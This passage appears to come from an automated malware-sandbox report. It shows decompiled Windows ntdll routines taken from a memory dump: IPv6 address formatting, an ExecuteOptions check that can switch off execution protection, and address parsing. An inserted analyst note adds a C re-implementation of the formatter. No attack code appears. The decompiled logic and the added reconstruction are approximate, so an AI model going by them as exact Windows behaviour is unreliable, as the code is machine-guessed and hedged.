                                                							E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                						}
                                                						_v8 = _t318;
                                                						goto L30;
                                                					}
                                                				}
                                                				_t284 = _v24;
                                                				_t322 = _t284 + 4;
                                                				_push(_t284);
                                                				_v48 = _t322;
                                                				E0253718A(_t284);
                                                				_t339 = _t335 + 4;
                                                				if(_t322 == _t318) {
                                                					_v28 = _t318;
                                                				} else {
                                                					_v28 = E0251E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                				}
                                                				if(_v28 == _t318) {
                                                					_v48 = _t318;
                                                					goto L58;
                                                				} else {
                                                					E02512340(_v28, _v8, _v24);
                                                					_v16 = _v28;
                                                					_a4 = _t318;
                                                					_t288 = E0252E679(_v28, _t332);
                                                					_t335 = _t339 + 0x14;
                                                					while(1) {
                                                						_v12 = _t288;
                                                						if(_t288 == _t318) {
                                                							break;
                                                						}
                                                						_v12 = _v12 + 2;
                                                						 *_v12 = 0;
                                                						E0251E2A8(_v12,  &_v68, _v16);
                                                						if(E02535553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                						_v16 = _v12;
                                                						_t288 = E0252E679(_v12, _t332);
                                                						_pop(_t322);
                                                					}
                                                					_t296 = _v16;
                                                					if( *_v16 != _t318) {
                                                						E0251E2A8(_t322,  &_v68, _t296);
                                                						if(E02535553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                					}
                                                					if(_a4 == _t318) {
                                                						E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                						_v48 = _t318;
                                                						_v28 = _t318;
                                                					}
                                                					if(_v8 != _t318) {
                                                						E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					}
                                                					_v8 = _t318;
                                                					goto L17;
                                                				}
                                                			}

                                                0x02538788
                                                0x02538788
                                                0x02538791
                                                0x02538794
                                                0x02538798
                                                0x0253879b
                                                0x0253879e
                                                0x025387a1
                                                0x025387a4
                                                0x025387a7
                                                0x025387aa
                                                0x025387af
                                                0x02581ad3
                                                0x02538b0a
                                                0x02538b0d
                                                0x02538b13
                                                0x02538b19
                                                0x02538b1f
                                                0x02538b25
                                                0x02538b2b
                                                0x02538b31
                                                0x02538b37
                                                0x02538b3d
                                                0x02538b46
                                                0x02538b46
                                                0x025387c6
                                                0x025387d0
                                                0x02581ae0
                                                0x02581ae6
                                                0x02581af8
                                                0x02581af8
                                                0x02581afd
                                                0x02581afe
                                                0x02581b01
                                                0x02581b06
                                                0x02581b06
                                                0x025387d6
                                                0x025387f2
                                                0x025387f7
                                                0x02538807
                                                0x0253880a
                                                0x0253880f
                                                0x02538810
                                                0x02538813
                                                0x02538818
                                                0x02538818
                                                0x0253882c
                                                0x02538831
                                                0x02538838
                                                0x02538908
                                                0x02538920
                                                0x025389f0
                                                0x02538a08
                                                0x02538af6
                                                0x02538af6
                                                0x02538af8
                                                0x02538afb
                                                0x02581beb
                                                0x02581beb
                                                0x02538b04
                                                0x02581bf8
                                                0x02581c0e
                                                0x02581c13
                                                0x02581c16
                                                0x02581c16
                                                0x02581bf8
                                                0x00000000
                                                0x02538b04
                                                0x02538a0e
                                                0x02538a11
                                                0x02538a14
                                                0x02538a15
                                                0x02538a18
                                                0x02538a22
                                                0x02538b59
                                                0x02538a28
                                                0x02538a3c
                                                0x02538a3c
                                                0x02538a42
                                                0x02581bb0
                                                0x02581b11
                                                0x02581b11
                                                0x00000000
                                                0x02538a48
                                                0x02538a51
                                                0x02538a5b
                                                0x02538a5e
                                                0x02538a61
                                                0x02538a69
                                                0x02538a69
                                                0x02538a6d
                                                0x00000000
                                                0x00000000
                                                0x02538a74
                                                0x02538a7c
                                                0x02538a7d
                                                0x02538a91
                                                0x02538a93
                                                0x02538a93
                                                0x02538a98
                                                0x02538a9b
                                                0x02538aa1
                                                0x02538aa1
                                                0x02538aa4
                                                0x02538aaa
                                                0x02538ab1
                                                0x02538ac5
                                                0x02538ac7
                                                0x02538ac7
                                                0x02538ac5
                                                0x02538ace
                                                0x02581bc9
                                                0x02581bce
                                                0x02581bd2
                                                0x02581bd2
                                                0x02538ad8
                                                0x02538aeb
                                                0x02538aeb
                                                0x02538af0
                                                0x02538af4
                                                0x00000000
                                                 Disassembly address column only (instruction text not present in this extraction): addresses 0x0253883e to 0x02538b51 and 0x02581b0e to 0x02581ba8.

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 025389FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 025387E6
                                                • Kernel-MUI-Language-Disallowed, xrefs: 02538914
                                                • Kernel-MUI-Language-Allowed, xrefs: 02538827
                                                • WindowsExcludedProcs, xrefs: 025387C1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                 • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 50933e3a0b94120737382bfd28f31e630bfa7dbd2e42858df537284ae5035f64
                                                • Instruction ID: 16b69dc605866405db4b20a1f336b8dd0b91993e9b7cdf8f5832d3aef68eeaf0
                                                • Opcode Fuzzy Hash: 50933e3a0b94120737382bfd28f31e630bfa7dbd2e42858df537284ae5035f64
                                                • Instruction Fuzzy Hash: A2F11AB2D0020AEFDF16EF94C984AEEBBB9FF48304F14546AE505A7210E735AA45CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 38%
                                                			E025513CB(intOrPtr* _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _t71;
                                                				signed int _t78;
                                                				signed int _t86;
                                                				char _t90;
                                                				signed int _t91;
                                                				signed int _t96;
                                                				intOrPtr _t108;
                                                				signed int _t114;
                                                				void* _t115;
                                                				intOrPtr _t128;
                                                				intOrPtr* _t129;
                                                				void* _t130;
                                                
                                                				_t129 = _a4;
                                                				_t128 = _a8;
                                                				_t116 = 0;
                                                				_t71 = _t128 + 0x5c;
                                                				_v8 = 8;
                                                				_v20 = _t71;
                                                				if( *_t129 == 0) {
                                                					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                						if(_t96 != 0) {
                                                							L38:
                                                							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                								goto L5;
                                                							} else {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t86 = E02547707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                								L36:
                                                								return _t128 + _t86 * 2;
                                                							}
                                                						}
                                                						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                						if(_t114 == 0) {
                                                							L33:
                                                							_t115 = 0x2512926;
                                                							L35:
                                                							_push( *(_t129 + 0xf) & 0x000000ff);
                                                							_push( *(_t129 + 0xe) & 0x000000ff);
                                                							_push( *(_t129 + 0xd) & 0x000000ff);
                                                							_push( *(_t129 + 0xc) & 0x000000ff);
                                                							_t86 = E02547707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                							goto L36;
                                                						}
                                                						if(_t114 != 0xffff) {
                                                							_t116 = 0;
                                                							goto L38;
                                                						}
                                                						if(_t114 != 0) {
                                                							_t115 = 0x2519cac;
                                                							goto L35;
                                                						}
                                                						goto L33;
                                                					}
                                                				} else {
                                                					L5:
                                                					_a8 = _t116;
                                                					_a4 = _t116;
                                                					_v12 = _t116;
                                                					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                						if( *(_t129 + 0xa) == 0xfe5e) {
                                                							_v8 = 6;
                                                						}
                                                					}
                                                					_t90 = _v8;
                                                					if(_t90 <= _t116) {
                                                						L11:
                                                						if(_a8 - _a4 <= 1) {
                                                							_a8 = _t116;
                                                							_a4 = _t116;
                                                						}
                                                						_t91 = 0;
                                                						if(_v8 <= _t116) {
                                                							L22:
                                                							if(_v8 < 8) {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t128 = _t128 + E02547707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                							}
                                                							return _t128;
                                                						} else {
                                                 							L14:
                                                							if(_a4 > _t91 || _t91 >= _a8) {
                                                								if(_t91 != _t116 && _t91 != _a8) {
                                                									_push(":");
                                                									_push(_t71 - _t128 >> 1);
                                                									_push(_t128);
                                                									_t128 = _t128 + E02547707() * 2;
                                                									_t71 = _v20;
                                                									_t130 = _t130 + 0xc;
                                                								}
                                                								_t78 = E02547707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                								_t130 = _t130 + 0x10;
                                                							} else {
                                                								_push(L"::");
                                                								_push(_t71 - _t128 >> 1);
                                                								_push(_t128);
                                                								_t78 = E02547707();
                                                								_t130 = _t130 + 0xc;
                                                								_t91 = _a8 - 1;
                                                							}
                                                							_t91 = _t91 + 1;
                                                							_t128 = _t128 + _t78 * 2;
                                                							_t71 = _v20;
                                                							if(_t91 >= _v8) {
                                                								goto L22;
                                                							}
                                                							_t116 = 0;
                                                							goto L14;
                                                						}
                                                					} else {
                                                						_t108 = 1;
                                                						_v16 = _t129;
                                                						_v24 = _t90;
                                                						do {
                                                							if( *_v16 == _t116) {
                                                								if(_t108 - _v12 > _a8 - _a4) {
                                                									_a4 = _v12;
                                                									_a8 = _t108;
                                                								}
                                                								_t116 = 0;
                                                							} else {
                                                								_v12 = _t108;
                                                							}
                                                							_v16 = _v16 + 2;
                                                							_t108 = _t108 + 1;
                                                							_t26 =  &_v24;
                                                							 *_t26 = _v24 - 1;
                                                						} while ( *_t26 != 0);
                                                						goto L11;
                                                					}
                                                				}
                                                 			}

                                                 Disassembly address column only for E025513CB (instruction text not present in this extraction): addresses 0x0255138e to 0x025514ac and 0x0257e8fd to 0x0257ea05.

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                 • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 45b8c1c9b8a6c1d495776cbe7497e27d0baa9bfff7adad2591a4920029b0cecb
                                                • Instruction ID: 1411232c99e4e314d5f9d29afd6e69e3ce63fab4318e85f0a0e3c849c026cbe6
                                                • Opcode Fuzzy Hash: 45b8c1c9b8a6c1d495776cbe7497e27d0baa9bfff7adad2591a4920029b0cecb
                                                • Instruction Fuzzy Hash: 2A612871D00A65EADF24DF59C8A0ABFBFB5FF84304B54C46EE89A47540D734A640CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%
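
Reading note on E025513CB above. Its format strings ("::%hs%u.%u.%u.%u", "::ffff:0:%u.%u.%u.%u", ":%u.%u.%u.%u", "%x", "::") and its search for the longest run of zero 16-bit groups are those of an IPv6 address-to-text formatter, and the "CLIENT(ntdll):" strings in the following function place this dump region (the image at 0x024F0000) in ntdll rather than in the payload. The C below is an added example, not code from this report or from Windows, that re-implements the control flow as it reads in the decompile so the special cases can be exercised: the three embedded-IPv4 forms taken when groups 0-3 are zero and group 6 is not, the ISATAP case that prints only six hex groups, and the zero-run search with its leftmost tie-break and no compression of a single zero group. Assumptions: groups are read in network byte order (the listing reads raw little-endian words with no visible byte swap, so its constants 0xfe5e and 0xfffd appear here as 0x5efe and 0xfdff); the narrow string at 0x2512926 is taken to be empty and the one at 0x2519cac to be "ffff:" (the String ID line above lists "ffff:"); the sample addresses are constructed, and the names ipv6_to_string, emit and fmt_eq are mine.

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 16-bit group i of a 16-byte address in network byte order. Assumption:
 * the listing reads raw little-endian words with no visible byte swap, so
 * its constants 0xfe5e / 0xfffd become 0x5efe / 0xfdff here. */
static unsigned group(const uint8_t a[16], int i)
{
    return ((unsigned)a[2 * i] << 8) | a[2 * i + 1];
}

/* Bounded append mirroring the (end - cursor) >> 1 length the listing
 * passes to swprintf; stays NUL-terminated on truncation, returns new pos. */
static size_t emit(char *out, size_t cap, size_t *pos, const char *fmt, ...)
{
    int n; va_list ap;
    va_start(ap, fmt);
    n = vsnprintf(out + *pos, cap - *pos, fmt, ap);
    va_end(ap);
    if (n > 0)
        *pos += ((size_t)n < cap - *pos) ? (size_t)n : cap - *pos - 1;
    return *pos;
}

/* Format a into out (capacity cap >= 1); returns the length written. */
size_t ipv6_to_string(const uint8_t a[16], char *out, size_t cap)
{
    size_t pos = 0;
    int hexgroups = 8;                      /* _v8: groups printed as hex */
    int best_start = 0, best_end = 0, last_nonzero = 0, i;

    if (cap == 0) return 0;
    /* Embedded-IPv4 forms: groups 0-3 zero and group 6 non-zero, so "::"
     * and "::1" never take this path. Other g4/g5 pairs fall through. */
    if (group(a, 0) == 0 && group(a, 1) == 0 && group(a, 2) == 0 &&
        group(a, 3) == 0 && group(a, 6) != 0) {
        unsigned g4 = group(a, 4), g5 = group(a, 5);
        if (g4 == 0 && g5 == 0)              /* IPv4-compatible  ::a.b.c.d */
            return emit(out, cap, &pos, "::%s%u.%u.%u.%u", "", a[12], a[13], a[14], a[15]);
        if (g4 == 0 && g5 == 0xffff)         /* IPv4-mapped      ::ffff:a.b.c.d */
            return emit(out, cap, &pos, "::%s%u.%u.%u.%u", "ffff:", a[12], a[13], a[14], a[15]);
        if (g4 == 0xffff && g5 == 0)         /* IPv4-translated  ::ffff:0:a.b.c.d */
            return emit(out, cap, &pos, "::ffff:0:%u.%u.%u.%u", a[12], a[13], a[14], a[15]);
    }

    /* ISATAP interface id 0000:5efe / 0200:5efe: the last 32 bits print as
     * dotted-decimal, so only six groups print as hex. */
    if ((group(a, 4) & 0xfdff) == 0 && group(a, 5) == 0x5efe)
        hexgroups = 6;

    /* Longest run of zero groups, leftmost on ties (strict '>'); a run of
     * one group is not compressed (the _a8 - _a4 <= 1 reset). */
    for (i = 1; i <= hexgroups; i++) {
        if (group(a, i - 1) != 0)
            last_nonzero = i;
        else if (i - last_nonzero > best_end - best_start) {
            best_start = last_nonzero;
            best_end = i;
        }
    }
    if (best_end - best_start <= 1)
        best_start = best_end = 0;

    for (i = 0; i < hexgroups; i++) {
        if (i >= best_start && i < best_end) {
            emit(out, cap, &pos, "::");
            i = best_end - 1;               /* loop increment skips the run */
            continue;
        }
        if (i != 0 && i != best_end)        /* "::" already supplied the ':' */
            emit(out, cap, &pos, ":");
        emit(out, cap, &pos, "%x", group(a, i));
    }
    if (hexgroups < 8)
        emit(out, cap, &pos, ":%u.%u.%u.%u", a[12], a[13], a[14], a[15]);
    return pos;
}

/* Constructed sample addresses (not taken from the analysed document). */
const uint8_t ADDR_LOOPBACK[16] = {0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,1};
const uint8_t ADDR_DOC[16]      = {0x20,0x01,0x0d,0xb8,0,0,0,0, 0,0,0,0,0,0,0,1};
const uint8_t ADDR_V4COMPAT[16] = {0,0,0,0,0,0,0,0, 0,0,0,0, 192,0,2,10};
const uint8_t ADDR_V4MAPPED[16] = {0,0,0,0,0,0,0,0, 0,0,0xff,0xff, 192,0,2,10};
const uint8_t ADDR_V4TRANS[16]  = {0,0,0,0,0,0,0,0, 0xff,0xff,0,0, 192,0,2,10};
const uint8_t ADDR_FALLTHRU[16] = {0,0,0,0,0,0,0,0, 0,0,0x12,0x34, 192,0,2,10};
const uint8_t ADDR_ISATAP[16]   = {0xfe,0x80,0,0,0,0,0,0, 0x02,0x00,0x5e,0xfe, 192,0,2,10};
const uint8_t ADDR_TIE[16]      = {0,1,0,0,0,0,0,1, 0,0,0,0,0,1,0,1};
const uint8_t ADDR_ONEZERO[16]  = {0x20,0x01,0x0d,0xb8,0,0,0,1, 0,1,0,1,0,1,0,1};

/* Format with capacity cap (clamped to 64) and compare with expected text. */
int fmt_eq(const uint8_t a[16], size_t cap, const char *expect)
{
    char buf[64];
    ipv6_to_string(a, buf, cap > sizeof buf ? sizeof buf : cap);
    return strcmp(buf, expect) == 0;
}
```

Two points for triage follow from this reading. First, the 0x02500000 region is loader and runtime code, so the string hits listed under Similarity for this function are not network indicators of the payload. Second, the listing shows no byte swap before the "%x" write, and the ISATAP test compares the raw word against 0xfe5e; whether the caller hands the routine swapped words is not something this dump settles, so an analyst matching addresses against these strings should check the caller before trusting the group order.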

                                                C-Code - Quality: 64%
                                                			E02547EFD(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v540;
                                                				unsigned int _v544;
                                                				signed int _v548;
                                                				intOrPtr _v552;
                                                				char _v556;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t33;
                                                				void* _t38;
                                                				unsigned int _t46;
                                                				unsigned int _t47;
                                                				unsigned int _t52;
                                                				intOrPtr _t56;
                                                				unsigned int _t62;
                                                				void* _t69;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t73;
                                                				void* _t74;
                                                				void* _t75;
                                                				void* _t76;
                                                				void* _t77;
                                                
                                                				_t33 =  *0x25f2088; // 0x76505f1a
                                                				_v8 = _t33 ^ _t73;
                                                				_v548 = _v548 & 0x00000000;
                                                				_t72 = _a4;
                                                				if(E02547F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                					__eflags = _v548;
                                                					if(_v548 == 0) {
                                                						goto L1;
                                                					}
                                                					_t62 = _t72 + 0x24;
                                                					E02563F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                					_t71 = 0x214;
                                                					_v544 = 0x214;
                                                					E0251DFC0( &_v540, 0, 0x214);
                                                					_t75 = _t74 + 0x20;
                                                					_t46 =  *0x25f4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                					__eflags = _t46;
                                                					if(_t46 == 0) {
                                                						goto L1;
                                                					}
                                                					_t47 = _v544;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						goto L1;
                                                					}
                                                					__eflags = _t47 - 0x214;
                                                					if(_t47 >= 0x214) {
                                                						goto L1;
                                                					}
                                                					_push(_t62);
                                                					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                					E02563F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                					_t52 = E02520D27( &_v540, L"Execute=1");
                                                					_t76 = _t75 + 0x1c;
                                                					_push(_t62);
                                                					__eflags = _t52;
                                                					if(_t52 == 0) {
                                                						E02563F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                						_t71 =  &_v540;
                                                						_t56 = _t73 + _v544 - 0x218;
                                                						_t77 = _t76 + 0x14;
                                                						_v552 = _t56;
                                                						__eflags = _t71 - _t56;
                                                						if(_t71 >= _t56) {
                                                							goto L1;
                                                						} else {
                                                							goto L10;
                                                						}
                                                						while(1) {
                                                							L10:
                                                							_t62 = E02528375(_t71, 0x20);
                                                							_pop(_t69);
                                                							__eflags = _t62;
                                                							if(__eflags != 0) {
                                                								__eflags = 0;
                                                								 *_t62 = 0;
                                                							}
                                                							E02563F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                							_t77 = _t77 + 0x10;
                                                							E0258E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                							__eflags = _t62;
                                                							if(_t62 == 0) {
                                                								goto L1;
                                                							}
                                                							_t31 = _t62 + 2; // 0x2
                                                							_t71 = _t31;
                                                							__eflags = _t71 - _v552;
                                                							if(_t71 >= _v552) {
                                                								goto L1;
                                                							}
                                                						}
                                                					}
                                                					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                					_push(3);
                                                					_push(0x55);
                                                					E02563F92();
                                                					_t38 = 1;
                                                					L2:
                                                					return E0251E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                				}
                                                				L1:
                                                				_t38 = 0;
                                                				goto L2;
                                                			}

                                                0x02547f08
                                                0x02547f0f
                                                0x02547f12
                                                0x02547f1b
                                                0x02547f31
                                                0x02563ead
                                                0x02563eb4
                                                0x00000000
                                                0x00000000
                                                0x02563eba
                                                0x02563ecd
                                                0x02563ed2
                                                0x02563ee1
                                                0x02563ee7
                                                0x02563eec
                                                0x02563f12
                                                0x02563f18
                                                0x02563f1a
                                                0x00000000
                                                0x00000000
                                                0x02563f20
                                                0x02563f26
                                                0x02563f28
                                                0x00000000
                                                0x00000000
                                                0x02563f2e
                                                0x02563f30
                                                0x00000000
                                                0x00000000
                                                0x02563f3a
                                                0x02563f3b
                                                0x02563f53
                                                0x02563f64
                                                0x02563f69
                                                0x02563f6c
                                                0x02563f6d
                                                0x02563f6f
                                                0x0256e304
                                                0x0256e30f
                                                0x0256e315
                                                0x0256e31e
                                                0x0256e321
                                                0x0256e327
                                                0x0256e329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0256e32f
                                                0x0256e32f
                                                0x0256e337
                                                0x0256e33a
                                                0x0256e33b
                                                0x0256e33d
                                                0x0256e33f
                                                0x0256e341
                                                0x0256e341
                                                0x0256e34e
                                                0x0256e353
                                                0x0256e358
                                                0x0256e35d
                                                0x0256e35f
                                                0x00000000
                                                0x00000000
                                                0x0256e365
                                                0x0256e365
                                                0x0256e368
                                                0x0256e36e
                                                0x00000000
                                                0x00000000
                                                0x0256e374
                                                0x0256e32f
                                                0x02563f75
                                                0x02563f7a
                                                0x02563f7c
                                                0x02563f7e
                                                0x02563f86
                                                0x02547f39
                                                0x02547f47
                                                0x02547f47
                                                0x02547f37
                                                0x02547f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02563F12
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0256E345
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02563F75
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02563F4A
                                                • ExecuteOptions, xrefs: 02563F04
                                                • Execute=1, xrefs: 02563F5E
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02563EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0256E2FB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: dd7c2f09f653881b87013fe60004cbbfc48c4cf0020f097eb987509899465047
                                                • Instruction ID: 2551058ac1b17fa621f4360d76adad718b6f0028d76e619d82989c9291cc4ecc
                                                • Opcode Fuzzy Hash: dd7c2f09f653881b87013fe60004cbbfc48c4cf0020f097eb987509899465047
                                                • Instruction Fuzzy Hash: 5941BB7168071D7AEB209E94DCC9FEBB3BDBF58704F0005A9A505E7080EB70AA458F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02550B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				void* _t108;
                                                				void* _t116;
                                                				char _t120;
                                                				short _t121;
                                                				void* _t128;
                                                				intOrPtr* _t130;
                                                				char _t132;
                                                				short _t133;
                                                				intOrPtr _t141;
                                                				signed int _t156;
                                                				signed int _t174;
                                                				intOrPtr _t177;
                                                				intOrPtr* _t179;
                                                				intOrPtr _t180;
                                                				void* _t183;
                                                
                                                				_t179 = _a4;
                                                				_t141 =  *_t179;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_v8 = 0;
                                                				_v24 = 0;
                                                				_v12 = 0;
                                                				_v32 = 0;
                                                				_v20 = 0;
                                                				if(_t141 == 0) {
                                                					L41:
                                                					 *_a8 = _t179;
                                                					_t180 = _v24;
                                                					if(_t180 != 0) {
                                                						if(_t180 != 3) {
                                                							goto L6;
                                                						}
                                                						_v8 = _v8 + 1;
                                                					}
                                                					_t174 = _v32;
                                                					if(_t174 == 0) {
                                                						if(_v8 == 7) {
                                                							goto L43;
                                                						}
                                                						goto L6;
                                                					}
                                                					L43:
                                                					if(_v16 != 1) {
                                                						if(_v16 != 2) {
                                                							goto L6;
                                                						}
                                                						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                						L47:
                                                						if(_t174 != 0) {
                                                							E02528980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                							_t116 = 8;
                                                							E0251DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_t180 != 0) {
                                                						if(_v12 > 3) {
                                                							goto L6;
                                                						}
                                                						_t120 = E02550CFA(_v28, 0, 0xa);
                                                						_t183 = _t183 + 0xc;
                                                						if(_t120 > 0xff) {
                                                							goto L6;
                                                						}
                                                						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                						goto L47;
                                                					}
                                                					if(_v12 > 4) {
                                                						goto L6;
                                                					}
                                                					_t121 = E02550CFA(_v28, _t180, 0x10);
                                                					_t183 = _t183 + 0xc;
                                                					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                					goto L47;
                                                				} else {
                                                					while(1) {
                                                						_t123 = _v16;
                                                						if(_t123 == 0) {
                                                							goto L7;
                                                						}
                                                						_t108 = _t123 - 1;
                                                						if(_t108 != 0) {
                                                							goto L1;
                                                						}
                                                						_t178 = _t141;
                                                						if(E025506BA(_t108, _t141) == 0 || _t135 == 0) {
                                                							if(E025506BA(_t135, _t178) == 0 || E02550A5B(_t136, _t178) == 0) {
                                                								if(_t141 != 0x3a) {
                                                									if(_t141 == 0x2e) {
                                                										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                											goto L41;
                                                										} else {
                                                											_v24 = _v24 + 1;
                                                											L27:
